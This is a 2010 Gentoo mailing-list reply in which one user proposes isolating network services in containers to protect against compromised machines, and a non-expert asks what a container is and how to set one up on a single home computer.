1 |
On Fri, Aug 13, 2010 at 8:25 AM, Enrico Weigelt <weigelt@×××××.de> wrote: |
2 |
> * Paul Hartman <paul.hartman+gentoo@×××××.com> wrote: |
3 |
> |
4 |
> <snip> |
5 |
> |
6 |
> Apropos cracked machines: |
7 |
> |
8 |
> In recent years I often got trouble w/ cracked customer's boxes |
9 |
> (one eg. was abused for SIP-calling people around the world and |
10 |
> asking them for their debit card codes ;-o). So thought about |
11 |
> protection against those scenarios. The solution: |
12 |
> |
13 |
> Put all remotely available services into containers and make the |
14 |
> host system only accessible via special channels (eg. serial console). |
15 |
> You can run automatic sanity tests and security alerts from the hosts |
16 |
> system, which cannot be highjacked (as long as there's no kernel |
17 |
> bug which allows escaping a container ;-o). |
18 |
> |
19 |
> This also brings several other benefits, eg. easier backups, quick |
20 |
> migration to other machines, etc. |
21 |
> |
22 |
> |
23 |
> cu |
24 |
|
25 |
Hi Enrico, |
26 |
Since I'm not an IT guy could you please explain this just a bit |
27 |
more? What is 'a container'? Is it a chroot running on the same |
28 |
machine? A different machine? Something completely different? |
29 |
|
30 |
In the OP's case (I believe) he thought a personal machine at home |
31 |
was compromised. If that's the case then without doubling my |
32 |
electrical bill (2 computers) how would I implement your containers? |
33 |
|
34 |
Thanks, |
35 |
Mark |